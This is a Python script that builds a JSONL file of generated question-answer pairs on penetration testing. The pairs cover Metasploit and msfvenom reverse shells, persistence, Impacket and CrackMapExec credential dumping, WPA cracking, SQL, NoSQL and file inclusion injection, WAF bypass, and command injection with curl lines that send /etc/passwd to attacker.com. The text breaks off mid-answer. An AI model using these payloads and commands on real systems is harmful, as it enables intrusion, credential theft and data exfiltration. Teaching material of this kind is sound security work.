#!/usr/bin/env python3
"""gen_f_fill7.py -- final push to 1000+ cyber pairs for upgrade_f"""
import json, pathlib

OUT = pathlib.Path('/workspace/data_upgrades/upgrade_f.jsonl')
OUT.parent.mkdir(parents=True, exist_ok=True)

pairs = []
def p(q, a):
    pairs.append((q, a))

# ── TOOLS AND TECHNIQUES ─────────────────────────────────────────────────────

p("How do you use Metasploit for exploitation?",
  "Metasploit Framework: open-source penetration testing platform; exploit modules, payloads, encoders, post-exploitation modules. Basic workflow: msfconsole (start console); search type:exploit name:eternalblue (search modules); use exploit/windows/smb/ms17_010_eternalblue (select module); show options (list required options); set RHOSTS 192.168.1.10 (set target); set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST 192.168.1.50; set LPORT 4444; exploit (or run). Payloads: staged vs stageless: staged (windows/x64/meterpreter/reverse_tcp) -- small stager connects back, downloads full payload -- smaller initial payload; stageless (windows/x64/meterpreter_reverse_tcp) -- full payload in one -- no callback for stage. Meterpreter (post-exploitation shell): sysinfo (system information); getuid (current user); getsystem (attempt privilege escalation); hashdump (dump SAM hashes); shell (drop to system shell); upload/download (transfer files); migrate PID (move to another process -- more stable; migrate to explorer.exe); background (background session); sessions -l (list sessions); sessions -i 1 (interact with session 1). Modules: auxiliary/scanner/smb/smb_ms17_010 (scan for EternalBlue without exploiting); auxiliary/scanner/portscan/tcp; post/windows/gather/credentials/credential_collector; post/multi/manage/shell_to_meterpreter (upgrade shell to meterpreter). MSFVenom: generate payloads standalone: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o payload.exe; msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=4444 -f elf > shell.elf; encoders for AV evasion: -e x86/shikata_ga_nai -i 5 (5 iterations -- increasingly detected by modern AV). Database: msfdb init; hosts, services, vulns commands; import nmap XML; correlate scan results with exploits.")

p("What is BeEF (Browser Exploitation Framework) and what can it do?",
  "BeEF (Browser Exploitation Framework): web application security assessment tool targeting browser vulnerabilities; demonstrates impact of XSS attacks. Architecture: BeEF hook (beef.js) -- JavaScript loaded in victim browser via XSS or social engineering; communicates back to BeEF C2 server; enables real-time browser control. Capabilities: (1) Fingerprinting: browser type/version; OS; plugins; screen resolution; timezone; installed software (via plugin probing); browser history (CSS history hack). (2) Network reconnaissance: port scan internal network from victim browser (JavaScript XMLHttpRequest to internal IPs -- bypass firewall as requests originate from victim machine on internal network); ping sweep; detect internal services. (3) Social engineering: fake login dialogs (browser-styled); redirect to phishing page; fake browser update notification with malware download; persistent XSS to hook multiple victims from same page. (4) Metasploit integration: BeEF bind to Metasploit; browser exploit modules; Java exploit; PDF exploit via browser. (5) Keystroke logging: capture keystrokes in browser; steal passwords entered on page. (6) Webcam/microphone: request getUserMedia (requires user permission but crafted UI can trick user). (7) Clipboard theft: paste clipboard content via JavaScript execCommand. (8) Geolocation: request GPS location via browser API. (9) Cookie theft: steal accessible cookies (non-HttpOnly); send to BeEF. (10) BeEF tunneling proxy: route attacker HTTP traffic through hooked browser -- use victim browser to access internal resources. OPSEC: BeEF hook.js visible in page source; sophisticated users may notice; loaded via inline script or remote script tag. Usage in engagements: demonstrates XSS impact beyond alert(1); show client real-world consequences of XSS; pivot to internal network discovery. Defense: CSP blocks hook.js loading from external domain; HttpOnly cookies; browser isolation; endpoint detection of hook.js patterns.")

p("How do you use Burp Suite Professional for web application testing?",
  "Burp Suite: leading web application security testing platform. Core components: Proxy: intercept and modify browser requests; configure browser to use Burp proxy (127.0.0.1:8080); install Burp CA certificate for HTTPS interception; match/replace rules for automated modifications. Target / Sitemap: crawled pages; add to scope; filter to focus testing. Scanner: automated vulnerability detection; active scan (sends attack payloads) and passive scan (analyses traffic without sending attacks); JavaScript analysis; smart scanning. Repeater: resend and modify individual requests; essential for manual exploitation; test parameter tampering; chain requests. Intruder: automated payload attacks; attack types: Sniper (one payload position), Battering Ram (same payload in all positions), Pitchfork (parallel payload lists), Cluster Bomb (all combinations); configure payload lists (wordlists, character fuzz, numbers); use for brute force, parameter fuzzing, IDOR enumeration, header injection. Comparer: diff two HTTP responses; useful for blind SQLi (compare responses for true/false conditions) and finding changes in responses. Decoder: encode/decode: URL, Base64, HTML entities, hex, binary, ASCII; compose multiple transforms. Sequencer: test randomness of session tokens; capture multiple tokens; statistical analysis; entropy score. Extensions (BApp Store): active scan extensions; Autorize (IDOR testing -- replay requests with different user tokens); JWT Editor; HTTP Request Smuggler; Hackvertor (encoding/obfuscation); Param Miner (hidden parameter discovery); CSRF Scanner; Retire.js (outdated JavaScript libraries); GQL Raider (GraphQL); Logger++ (advanced logging); Upload Scanner. Collaborator: out-of-band detection; unique subdomain (xxx.oastify.com) for DNS/HTTP/SMTP callbacks; detect blind SSRF, blind XXE, blind OS command injection; interactions tab shows who connected. Project files: save and reload entire testing session; professional feature; essential for long engagements.")

p("What is OWASP ZAP and how does it differ from Burp Suite?",
  "OWASP ZAP (Zed Attack Proxy): free, open-source web application security scanner; community-maintained by OWASP. Key features: Proxy: similar to Burp; intercept and modify requests; install CA certificate; configure browser. Active Scanner: sends attack payloads; detects SQLi, XSS, command injection, path traversal; less accurate than Burp Suite scanner; generates many false positives. Passive Scanner: analyses requests/responses for security issues without active attacks; low risk, safe on production. Spider: traditional web spider (follows links, forms) and Ajax Spider (executes JavaScript, crawls SPAs). HUD (Heads Up Display): in-browser overlay showing security findings while browsing; visual indicator on page. Fuzzer: customisable payload fuzzing similar to Burp Intruder; OWASP FuzzDB wordlists bundled. Script console: JRuby, Jython, JavaScript scripting; write custom scan rules, attacks, authentication scripts. Authentication: handle form-based, HTTP-basic, OAuth auth; maintain authenticated session during scan; detect when session expires. Automation: ZAP API; CI/CD integration; GitHub Actions ZAP scan action; OWASP ZAP Docker container (full scan, API scan, baseline scan modes); easily integrated into pipelines for automated security testing. Burp vs ZAP: Burp Professional: paid ($449/year per user); more accurate scanner; better extensibility; larger plugin ecosystem; preferred by professional pentesters; better Collaborator for OOB detection. ZAP: free; better for CI/CD integration (official Docker images, GitHub Actions); community-maintained; good for teams with budget constraints; automated scanning in pipelines. Both: proxy-based; similar core capabilities; both support modern web apps. DAST in CI/CD: ZAP commonly used in automated pipelines; triggered on every deployment to test environment; results parsed and converted to SARIF for GitHub Security tab or Jira tickets; gates deployment if Critical or High findings discovered.")

p("How do you use Nmap for network discovery and security scanning?",
  "Nmap: de-facto standard network scanner; host discovery, port scanning, service/version detection, OS detection, scripting. Host discovery: nmap -sn 192.168.1.0/24 (ping sweep -- no port scan; ARP on local network; ICMP + TCP SYN/ACK on remote); nmap -sn -PS80,443 192.168.1.0/24 (TCP SYN ping on port 80/443 -- works through firewalls that block ICMP). Port scanning techniques: TCP SYN scan (stealth): nmap -sS TARGET (requires root; sends SYN; RST after SYN-ACK -- never completes handshake; faster, less logged than full connect); TCP connect: nmap -sT TARGET (full 3-way handshake; does not require root; logged by applications); UDP scan: nmap -sU TARGET (slow; sends UDP packets; listens for ICMP port unreachable for closed ports or response for open); NULL/FIN/XMAS scans: nmap -sN/-sF/-sX (bypass some firewalls; not reliable on Windows). Port specification: nmap -p 80,443,8080 TARGET (specific ports); nmap -p 1-65535 TARGET (all ports); nmap -p- TARGET (all ports shorthand); nmap --top-ports 1000 TARGET (top 1000 most common ports). Service and version: nmap -sV TARGET (grab banners, identify service and version); nmap -sV --version-intensity 9 (max intensity, slower). OS detection: nmap -O TARGET (fingerprint OS from TCP/IP stack characteristics; requires root; unreliable through firewalls). Scripts: nmap --script=vuln TARGET (run all vulnerability scripts); nmap --script=safe TARGET (run safe scripts -- discovery only); nmap --script=smb-vuln-ms17-010 TARGET (check for EternalBlue); nmap --script=http-title,http-headers TARGET (web server info). Timing: -T0 (paranoid, very slow, evades IDS), -T1 (sneaky), -T2 (polite), -T3 (normal default), -T4 (aggressive, faster), -T5 (insane, may miss results). Output: nmap -oX output.xml TARGET (XML for import into Metasploit, Nessus); nmap -oN output.txt (normal text); nmap -oG output.grep (greppable); nmap -oA basename (all formats).")

p("What is Wireshark and how do you use it for security analysis?",
  "Wireshark: network protocol analyser; captures and dissects network packets in real-time or from PCAP files. Capture: select interface (eth0, wlan0, lo); capture filter (reduces captured traffic): host 192.168.1.1 (only traffic to/from IP); port 80 (HTTP only); not port 22 (exclude SSH); tcp (TCP only); net 192.168.1.0/24 (subnet). Stop capture; save as PCAP. Display filters (applied after capture; more powerful): ip.addr == 192.168.1.1; tcp.port == 80; http.request.method == GET; dns.qry.name contains google; tcp.flags.syn == 1 && tcp.flags.ack == 0 (SYN packets only -- port scan detection); http contains password (search HTTP bodies). Follow TCP stream: right-click packet > Follow > TCP Stream; reconstructs full conversation; useful for HTTP analysis, credential capture, malware traffic. Protocol dissection: Wireshark decodes 2000+ protocols; automatically detects protocol by port; HTTP headers visible; DNS query/response; TLS handshake (without decrypting payload). TLS decryption: import RSA private key (Preferences > Protocols > TLS > RSA keys) for RSA key exchange (legacy -- does not work with PFS); import TLS session keys (SSLKEYLOGFILE environment variable in browser/client -- logs session keys; Wireshark can import): Edit > Preferences > Protocols > TLS > (Pre)-Master-Secret log filename. Statistics: Conversations (all host pairs, byte counts, duration); Protocol Hierarchy (breakdown of protocols by percentage); IO Graphs (traffic over time); Expert Information (TCP retransmissions, errors, anomalies). Security use cases: capture and inspect malware C2 traffic; extract credentials from cleartext protocols (FTP, Telnet, HTTP basic auth); detect port scans (SYN flood to many ports); analyse malware PCAP from sandbox; detect data exfiltration (large outbound transfers, DNS tunneling -- high volume of DNS queries with long subdomain labels). Tshark: command-line Wireshark; tshark -r capture.pcap -Y http.request -T fields -e http.host -e http.request.uri (extract HTTP URIs from PCAP).")

p("How does the Metasploit persistence module work?",
  "Metasploit persistence: after obtaining meterpreter shell, establish persistent access that survives reboots. run persistence -X -i 10 -p 4444 -r 192.168.1.50 (deprecated module but illustrative: -X=start on boot, -i=retry interval, -p=local port, -r=local host). Modern module: use post/windows/manage/persistence_exe; options: STARTUP (USER/SYSTEM/SCHEDULER); PAYLOAD_NAME; PATH for executable; SESSION for active meterpreter session. Mechanism: drops executable to disk (default %APPDATA%); adds registry run key (HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run for user; HKLM for system -- requires admin); or creates scheduled task; executable phones home to handler at interval. Handler setup: auxiliary/multi/handler; set PAYLOAD matching persistence payload; set LHOST/LPORT; run -j (background); wait for connection when victim reboots. Stealthier persistence methods in real engagements: WMI subscriptions (post/windows/manage/wmi_persistence): no new files in obvious location; WMI event subscription runs PowerShell payload on trigger; harder to detect. Registry persistence: HKCU\\...\\Run key with base64-encoded PowerShell command; common and detectable. Startup folder: drop LNK or executable to shell:startup folder; user-space, no admin needed. Service: sc create + start; SYSTEM privileges if local admin; very persistent; but new service installation is logged. Powershell profile persistence: modify $PROFILE to run malicious command on every PowerShell launch; effective for environments with heavy PowerShell use. Scheduled task: schtasks /create ONLOGON trigger; evades simple run-key monitoring. Defence: persistence cleanup script on compromised hosts; baseline registry run keys; monitor new service installations; Autoruns (Sysinternals) for comprehensive persistence location review; EDR baseline and alert on new persistence locations.")

p("Explain how to conduct a wireless network penetration test.",
  "Wireless penetration test methodology: legal authorisation first; written permission including specific SSIDs and physical locations. Equipment: wireless adapter with monitor mode and packet injection capability (Alfa AWUS036ACH, AWUS036ACM -- Realtek or Atheros chipsets); external antenna for range; Kali Linux. Reconnaissance: airmon-ng start wlan0 (enable monitor mode; creates wlan0mon); airodump-ng wlan0mon (scan all channels; list APs with BSSID, channel, encryption, clients); airodump-ng wlan0mon --bssid TARGET_BSSID -c CHANNEL -w capture (focus on target, write capture). WPA2-Personal (PSK) attack: capture 4-way handshake: aireplay-ng -0 5 -a AP_BSSID -c CLIENT_MAC wlan0mon (deauth client 5 times; client reconnects -- handshake captured in airodump); hashcat -m 22000 capture.hc22000 rockyou.txt (WPA2 cracking; cap2hccapx or hcxtools to convert capture format); aircrack-ng capture.cap -w rockyou.txt (CPU-based, slower). PMKID attack (no client deauth needed): hcxdumptool -i wlan0mon -o output.pcapng --enable_status=1 (captures PMKID from AP without client); hcxpcapngtool output.pcapng -o hashfile.hc22000 (extract hashes); hashcat -m 22000 hashfile.hc22000 rockyou.txt. WEP attack (legacy, rare): IVs collection; aircrack-ng passively collects or actively injects; 50,000 IVs usually sufficient; aircrack-ng -b AP_BSSID capture.cap. WPA Enterprise (PEAP): evil twin attack with hostapd-wpe; capture MSCHAPv2 challenge-response; crack with asleap or hashcat; verify server certificate not enforced by client. Evil Twin: hostapd-wpe or airbase-ng creates rogue AP with same SSID; stronger signal than legitimate AP; clients associate; capture credentials. Post-access: WPA2 PSK cracked; connect to network; internal network scan; same as internal pentest from there. WPS PIN: wash -i wlan0mon (scan for WPS-enabled APs); reaver or bully (brute force WPS PIN -- 8 digits = 10^8 but split validation reduces to 11000 attempts); many APs have WPS lockout now. Report: include captured handshake evidence, crack time, recommendations: strong passphrase (20+ chars random), WPA3 upgrade, disable WPS.")

p("How do you use Impacket for Windows and Active Directory attacks?",
  "Impacket: Python library for network protocol manipulation; critical toolkit for Windows/AD penetration testing. Installation: pip install impacket or use Kali Linux (pre-installed). Key tools: smbclient.py: SMB client; list shares: smbclient.py domain/user:pass@TARGET; access share: use SHARE; ls; get file.txt. secretsdump.py: extract credentials remotely; requires domain admin or local admin: secretsdump.py domain/admin:pass@DC01 (DCSync automatically for DC; or dump SAM/LSA on regular host); output: username:RID:LM_HASH:NT_HASH::: format. psexec.py: remote command execution via service creation; requires admin SMB access: psexec.py domain/admin:pass@TARGET; or hash: psexec.py -hashes :NT_HASH domain/admin@TARGET cmd.exe; spawns SYSTEM shell. wmiexec.py: command execution via WMI; less noisy than psexec (no service installation); outputs via SMB file; wmiexec.py domain/admin:pass@TARGET. atexec.py: command execution via Task Scheduler; scheduled task created and deleted immediately; useful when SMB blocked. smbexec.py: reverse shell via SMB; avoids writing binary to disk. GetUserSPNs.py: Kerberoasting; GetUserSPNs.py domain/user:pass -dc-ip DC01 -request. GetNPUsers.py: AS-REP roasting; GetNPUsers.py domain/ -usersfile users.txt -no-pass. lookupsid.py: SID enumeration; bruteforce RIDs to enumerate users/groups: lookupsid.py domain/user:pass@TARGET. rpcdump.py: enumerate RPC interfaces; useful for lateral movement path analysis. reg.py: remote registry access; reg.py domain/admin:pass@TARGET query -keyName HKLM\\SAM. mssqlclient.py: MSSQL client with xp_cmdshell support. ntlmrelayx.py: NTLM relay attacks (part of Impacket); see SMB relay section. ticketer.py: create Golden/Silver tickets from krbtgt or service hash.")

p("What is CrackMapExec and how is it used for network pentesting?",
  "CrackMapExec (CME / cme or crackmapexec): post-exploitation tool for Active Directory environments; automates credential testing and lateral movement across Windows networks. Basic credential spraying: cme smb 192.168.1.0/24 -u administrator -p Password123 (test credentials against all hosts in range); output shows + (success) or - (failure) per host; --continue-on-success (don't stop at first success). Hash spraying: cme smb 192.168.1.0/24 -u administrator -H NT_HASH (Pass-the-Hash against network). Protocol modules: smb, winrm, mssql, ldap, ssh, rdp, vnc, wmi, ftp; cme ldap DC01 -u admin -p pass --users (enumerate AD users); cme ldap DC01 -u admin -p pass --groups (enumerate groups); cme mssql 192.168.1.100 -u sa -p password --no-bruteforce (test MSSQL credentials). SMB enumeration: cme smb TARGET -u user -p pass --shares (list shares and permissions); cme smb TARGET -u user -p pass --sessions (list active sessions -- find domain admin sessions); cme smb TARGET -u user -p pass --loggedon-users (list logged on users -- find targets for credential theft); cme smb TARGET -u user -p pass --disks (list drives); cme smb TARGET -u user -p pass -M spider_plus (spider file shares looking for interesting files). Remote execution: cme smb TARGET -u admin -p pass -x ipconfig (execute command via wmiexec method); cme smb TARGET -u admin -p pass -X Get-Process (execute PowerShell); cme smb TARGET -u admin -p pass -M mimikatz (use mimikatz module to dump credentials). Database: --export (export results to CSV/JSON for reporting). LDAP attacks: cme ldap DC01 -u user -p pass --gmsa (dump gMSA passwords -- require ReadGMSAPassword permission); cme ldap DC01 -u user -p pass --bloodhound (collect BloodHound data). Modules: built-in modules (-M mimikatz, -M lsassy, -M nanodump for LSASS dumping; -M web_delivery for payload staging; -M kerberoast for Kerberoasting). OPSEC: all SMB connections visible in network logs; credential testing creates Event 4625 failures; --local-auth for local account testing avoids domain logs.")

p("How do you perform OSINT (Open Source Intelligence) for a target?",
  "OSINT methodology: gather information from publicly available sources before engagement. Domain and IP intelligence: WHOIS history: whois domain.com; ViewDNS.info for historical WHOIS; SecurityTrails API for passive DNS. DNS enumeration: dig domain.com ANY; dig _dmarc.domain.com TXT (email security posture); subfinder -d domain.com (passive subdomain from Certificate Transparency, VirusTotal, etc.); amass enum -passive -d domain.com; dnsx -l subdomains.txt -a (resolve to IPs); crt.sh: SELECT * FROM certificate WHERE san LIKE domain.com -- find all certs issued. IP ranges: ASN lookup (bgp.he.net or asn.cymru.com); find all IP ranges for organisation (whois -h whois.radb.net -- -i origin AS1234). Shodan/Censys: shodan host TARGET_IP; shodan search org:TargetCompany port:8080; Censys.io for similar capability; Fofa (Chinese version); find internet-exposed services. People and org intelligence: LinkedIn: employee names, roles, org chart reconstruction, tech stack from job postings; email format discovery from LinkedIn + Hunter.io (firstname.lastname@domain.com format). Hunter.io: find email addresses for a domain; verify email format; find specific employee emails. GitHub: github.com/target_company or github.com/employee_usernames; search for hardcoded secrets: truffleHog --github_user employee; GitHub search: org:company password; Grayhat Warfare (public S3 buckets). Google dorks: site:domain.com filetype:pdf (documents); site:domain.com ext:txt password; site:domain.com site:pastebin.com (pastes mentioning company); inurl:vpn.domain.com. Breach data: HaveIBeenPwned API (check employee emails in breaches); DeHashed (search by email/domain for breach data); IntelX (intelligence X -- dark web search engine). Social media: Twitter/X, Reddit, Glassdoor reviews (reveal internal tools, frustrations, incidents); job postings reveal technology stack, security gaps, upcoming projects. Maltego: graphical link analysis; combine sources; entity relationships; transforms for VirusTotal, Shodan, LinkedIn, DNS. Report: OSINT findings often reveal initial attack vector; list all discovered assets (subdomains, IP ranges); identify potentially exposed credentials; employee targets for spearphishing; technology stack for vulnerability research.")

p("What security controls should be implemented for remote access?",
  "Remote access security controls: (1) VPN hardening: multi-factor authentication (MFA) on VPN; certificate-based authentication preferred over username/password; update VPN software immediately when CVEs published (VPN vulns are top initial access vector for ransomware groups); restrict VPN to necessary IP ranges (not to entire corporate network); geo-IP blocking (if employees only in certain countries); alert on VPN login from new countries/IPs. (2) Zero Trust Network Access (ZTNA): replaces traditional VPN; identity and device posture verified before each application access; no implicit trust based on network location; applications not visible until authenticated; CrowdStrike Falcon Zero Trust, Zscaler ZPA, Palo Alto Prisma Access; even compromised VPN credential grants no lateral movement access. (3) Remote Desktop (RDP) security: never expose RDP directly to internet (port 3389 scanned constantly by attackers); use RDP Gateway (RDGW) or VPN first; network-level authentication (NLA) enabled; RDP credential guard; restrict who can RDP (limited AD group); RDP logging (Event 4778/4779 session connect/disconnect; 4624 Type 10 logon). (4) SSH hardening: disable password authentication (require SSH keys): PasswordAuthentication no in sshd_config; disable root login: PermitRootLogin no; use key exchange: only safe algorithms (curve25519-sha256, ecdh-sha2-nistp256); use AllowUsers/AllowGroups to restrict who can SSH; port-knock or single-packet authorisation (SPA) for hidden SSH; fail2ban for brute force protection; certificate-based SSH (SSH CA signs user certificates -- expiry, principal restrictions, audit trail). (5) Privileged access: PAM solution (CyberArk, BeyondTrust) for all remote privileged access; session recording; just-in-time access; no standing privileged access. (6) Conditional access: Azure AD/Okta Conditional Access policies; device compliance check (patch level, AV running, disk encryption); block access from unknown devices; location-based policies.")

p("How does pentesting of ICS and OT environments differ from IT?",
  "ICS/OT penetration testing: Industrial Control Systems (SCADA, DCS, PLCs) and Operational Technology environments require special care; availability is paramount (downtime = physical consequences). Key differences: Safety first: disruption can cause physical harm (power grid, water treatment, manufacturing, oil/gas); never test without explicit safety protocols; safety instrumented systems (SIS) are never targets; agree on immediate stop procedures. Passive-only approach often required: active scanning with Nmap may crash PLCs (they have limited resources; malformed packets cause device reboots); use passive traffic monitoring (Zeek, Wireshark) instead of active scanning; only active scan in maintenance windows with engineering team present. Protocols: Modbus (port 502): widely used in manufacturing PLCs; no authentication; read/write coils and registers directly; Modbus scanner: modscan, modbus-cli; Shodan finds thousands of internet-exposed Modbus devices. DNP3 (Distributed Network Protocol): used in electric utilities, water; no authentication in DNP3 Basic; unsolicited responses; DNP3 master can send control commands to RTUs. EtherNet/IP (port 44818): Allen-Bradley PLCs; CIP protocol; read/write tags; enip-scan. IEC 61850: substation automation; GOOSE messages (multicast, no auth). OPC UA: modern IPC; has security (certificates, authentication) but often misconfigured. OT network segmentation assessment: is IT network truly separated from OT? Data historian often bridges both; engineering workstations connect to both; check for flat network. Common findings: internet-exposed HMIs (Human Machine Interface); weak/default credentials on PLCs and HMIs (admin/admin; siemens/100); unencrypted protocols (Modbus, DNP3) on WAN links; Windows XP/Server 2003 systems running control software that cannot be patched; USB ports active on critical systems; anti-virus disabled because it interferes with real-time control. Standards: IEC 62443 (OT security standard); NIST SP 800-82 (Guide to ICS Security); NERC CIP (electric utility).")

p("What are the different types of SQL injection?",
  "SQL injection types: (1) In-band SQLi (most common): error-based and union-based; attacker sees results directly in response. Error-based: trigger database error that includes query results: AND 1=CONVERT(int,(SELECT TOP 1 table_name FROM information_schema.tables)) -- (MSSQL); extractvalue(1,concat(0x7e,(select version()))) (MySQL); error message includes database data. Union-based: append UNION SELECT to original query; retrieve data in normal response: UNION SELECT username,password,null FROM users-- ; must match column count (ORDER BY 1,2,3 to find column count); must match data types (NULLs for flexible typing). (2) Blind SQLi: no direct output visible; infer from response differences. Boolean-based: AND 1=1 (true condition -- normal response) vs AND 1=2 (false -- different response); extract data bit-by-bit: AND SUBSTRING(username,1,1)=a (true/false per character). Time-based: use database sleep/delay function: AND SLEEP(5) (MySQL) -- response delayed if injected; 1=1 delays 5s, 1=2 does not; extract data character by character with time delays. (3) Out-of-band SQLi: data exfiltrated via separate channel (DNS or HTTP request from database server): MySQL LOAD_FILE then UNC path (Windows only): SELECT LOAD_FILE(CONCAT(0x5c5c5c5c,database(),0x2e,burpcollaborator,0x5c61)); Oracle UTL_HTTP to send data to attacker server; useful when no response difference visible. (4) Second-order injection: malicious input stored in database; injected later when retrieved and used in another SQL query without proper escaping; harder to detect with automated scanners. Databases: MySQL: INFORMATION_SCHEMA; -- comment; LIMIT; GROUP_CONCAT; SLEEP(5). MSSQL: sysobjects; -- comment; TOP; WAITFOR DELAY; xp_cmdshell. Oracle: ALL_TABLES; -- comment; ROWNUM; UTL_HTTP; DBMS_PIPE. PostgreSQL: pg_tables; -- comment; LIMIT; pg_sleep; COPY TO/FROM for file read/write. SQLite: sqlite_master; --; LIMIT; common in Android apps.")

p("How do you find and exploit file inclusion vulnerabilities?",
  "File inclusion vulnerabilities: web application includes files specified by user-controlled parameter. Local File Inclusion (LFI): server reads local file and includes it in response. Basic: http://target.com/page?file=../../../etc/passwd (path traversal); if successful: /etc/passwd contents in response. Bypassing filters: if filter strips ../: ....// (filter removes ../ leaving ../); %2e%2e%2f (URL encoding); %252e%252e%252f (double encoding); ....%2f; PHP wrappers: php://filter/convert.base64-encode/resource=/etc/passwd (base64 encode file content before output -- bypass PHP include restrictions); php://filter/read=string.rot13/resource=/etc/passwd. LFI to RCE: (1) Log poisoning: write PHP code into Apache/Nginx access log via malicious User-Agent: User-Agent: <?php system($_GET[cmd]);?>; then include log file: ?file=../../../../var/log/apache2/access.log&cmd=id; works if log file readable by web server user. (2) /proc/self/environ: include process environment file (often readable); inject PHP via User-Agent; include /proc/self/environ. (3) PHP session file: find PHP session file path (/var/lib/php/sessions/sess_SESSIONID); include session file; if session value contains PHP code (set via another parameter). (4) phpinfo() page: race condition; upload file via multipart form; file temporarily stored before processing; include temp file path from phpinfo() disclosing it. Remote File Inclusion (RFI): if allow_url_include=On in PHP configuration (disabled by default in PHP 5.2+): ?file=http://attacker.com/shell.php; server fetches and includes attacker file; RCE. Rare in modern PHP. Tools: LFISuite, Kadimus (automated LFI testing and exploitation); Burp Suite manual testing. Defence: whitelist allowed filenames; do not pass user input to include functions; chroot/open_basedir restriction; disable allow_url_include; sanitise path traversal sequences.")

p("What is WAF (Web Application Firewall) and how do you bypass it?",
  "WAF: security device that filters and monitors HTTP traffic to web applications; detects and blocks attacks (SQLi, XSS, command injection, path traversal). WAF bypass techniques: (1) Encoding: URL encoding: SELECT becomes %53%45%4C%45%43%54; double URL encoding: %2553; Unicode encoding: SELECT; hex encoding in SQL: 0x53454c454354. (2) Case variation: SeLeCt * FrOm uSeRs; WAF may only check lowercase patterns. (3) Comment insertion: SE/*comment*/LECT; SQL ignores comments; S/**/ELECT * FROM users; MySQL C-style comments. (4) Whitespace alternatives: %09 (tab), %0a (newline), %0d (carriage return), %0c (form feed); SELECT%09FROM%09users instead of spaces. (5) Version-based comments: /*!50000SELECT*/ (MySQL executes if version >= 5.0.00; bypasses WAFs that don't understand MySQL version comments). (6) HTTP parameter pollution: ?param=1&param=SELECT (some WAFs check first occurrence; backend uses last or concatenates). (7) Chunked transfer encoding: send payload in chunks; some WAFs only inspect first chunk. (8) HTTP request smuggling: use TE/CL discrepancy to bypass WAF inspection. (9) Protocol-level bypass: WAF expects HTTP/1.1; send HTTP/0.9 request; WebSocket upgrade; gzip compressed body not decoded by WAF. (10) Rate limiting bypass: distribute requests across multiple IPs; WAF rate limits per-IP. (11) Payload fragmentation: split XSS payload across multiple parameters; reassembled by server-side code. (12) Out-of-character sets: MySQL allows backtick as identifier quoting; `users` instead of users. Testing: send known payloads; observe WAF response (403, custom block page, different status code or body); iterate encodings and variations until WAF does not block; Burp Suite Intruder for automated bypass attempts; WAFfle, WAFNinja, bypass-firewalls-by-DNS-history, and Wfuzz for automation. Caution: WAF bypass alone is not a vulnerability; the underlying application must also be vulnerable.")

p("How do you approach HTTP header injection testing?",
  "HTTP header injection: attacker injects newline characters (CRLF -- \\r\\n) into HTTP response headers; allows adding arbitrary headers to response. How it works: web application reflects user input in HTTP response header without sanitisation: Set-Cookie: lang=USERINPUT; if USERINPUT = en\\r\\nSet-Cookie: session=attacker_value; response now contains two Set-Cookie headers. Finding CRLF injection: inject \\r\\n (%0d%0a), \\n (%0a) into headers reflected in response (Location, Set-Cookie, Content-Type reflected parameters); Burp: search response for injected newlines; tool: CRLFuzz. Impact: HTTP response splitting: inject \\r\\n\\r\\n to end headers; inject arbitrary response body; inject HTML/JavaScript = stored XSS via header; inject into redirect headers. Cache poisoning: inject Cache-Control: public, max-age=86400; cache stores attacker-controlled response. Cookie injection: inject Set-Cookie header with attacker-controlled session or authentication bypass. XSS: inject Content-Type: text/html\\r\\n\\r\\n<script>alert(1)</script>; server returns HTML response instead of expected content type. Host header injection: if application uses Host header for URL construction (password reset links, redirects) without validation: inject Host: attacker.com; password reset email contains link to attacker.com; victim clicks; attacker captures token. Similar attacks on other headers: X-Forwarded-For injection: if application trusts X-Forwarded-For for IP-based access control: inject X-Forwarded-For: 127.0.0.1 to bypass localhost-only restrictions. X-Forwarded-Host: if used for URL construction without validation: open redirect or XSS. Defence: sanitise user input before placing in response headers; remove newline characters (\\r, \\n); use framework functions for setting cookies and headers (they handle encoding); validate Host header against whitelist of allowed values.")

p("How do you exploit NoSQL injection vulnerabilities?",
  "NoSQL injection: attack NoSQL databases (MongoDB, CouchDB, Redis) by manipulating query operators. MongoDB injection: MongoDB queries use JSON-like operators ($where, $gt, $regex, $ne, $in); if application builds queries with user input: find({username: INPUT, password: INPUT}); inject operators. Authentication bypass: POST body: {username: admin, password: {$ne: null}}; in URL: ?username=admin&password[$ne]=null; PHP: $_POST[password] = array($ne => null) -- MongoDB query becomes {username: admin, password: {$ne: null}} -- matches any password not null = all users. Extracting data: {$regex: ^a} -- username starts with a (true/false enumeration); {$where: this.username==admin} -- JavaScript injection in $where operator. PHP HTTP parameter pollution for operators: password[$gt]=z (password greater than z -- bypasses some checks). Blind injection: use boolean operators to extract data character by character: regex enumeration of all usernames; similar to blind SQLi but with MongoDB syntax. Redis injection: if application passes user input to EVAL or raw commands; CONFIG SET dir /var/www/html; CONFIG SET dbfilename shell.php; SET key <?php system($_GET[cmd]);?>; BGSAVE -- writes webshell to disk; if SSRF reaches Redis: gopher:// protocol to send raw Redis commands. CouchDB: REST API; Mango query injection if parameters not validated; admin party (all admin access with no authentication -- default in old versions). LDAP injection: LDAP filters use ( ) | & ! * syntax; login filter: (&(uid=USER)(password=PASS)); inject: USER=*)(uid=*))(|(uid=* -- filter becomes (&(uid=*)(uid=*))(|(uid=*)(password=PASS)) -- always true authentication bypass. Defence: parameterise all queries; input validation; reject arrays/objects in fields expecting strings; use ODM (Object Document Mapper) to abstract queries; NoSQL database authentication and network-level access control.")

p("What is command injection and how do you find it?",
  "Command injection (OS command injection): web application passes user input to system shell command; attacker injects additional commands. Basic: application runs: ping -c 4 USER_INPUT; inject: 8.8.8.8; id or 8.8.8.8$(id) or 8.8.8.8`id`; server executes ping then id; output of id returned. Shell metacharacters: semicolon (;) -- command separator; pipe (|) -- pipe output; && -- run second command if first succeeds; || -- run if first fails; backtick (`) or $() -- command substitution; newline (%0a) -- new command. Contexts: URL: http://target.com/ping?host=8.8.8.8|id; JSON body: {host: 8.8.8.8;id}; file name in upload: filename=test.pdf;id.pdf (if filename passed to shell); HTTP headers (User-Agent, Referer used in log processing or reporting). Blind command injection: no output visible; use out-of-band: ping -c 1 attacker.com (DNS lookup confirms execution); curl http://attacker.com/$(id) (exfiltrate output via DNS/HTTP); time-based: 8.8.8.8; sleep 10 (response delayed 10s confirms injection). Advanced exfiltration: whoami | base64 | curl -d @- http://attacker.com/data (base64 encode and POST output); curl http://attacker.com/$(cat /etc/passwd | base64 | tr + - | tr / _) (send in URL path). Language-specific sinks: Python: 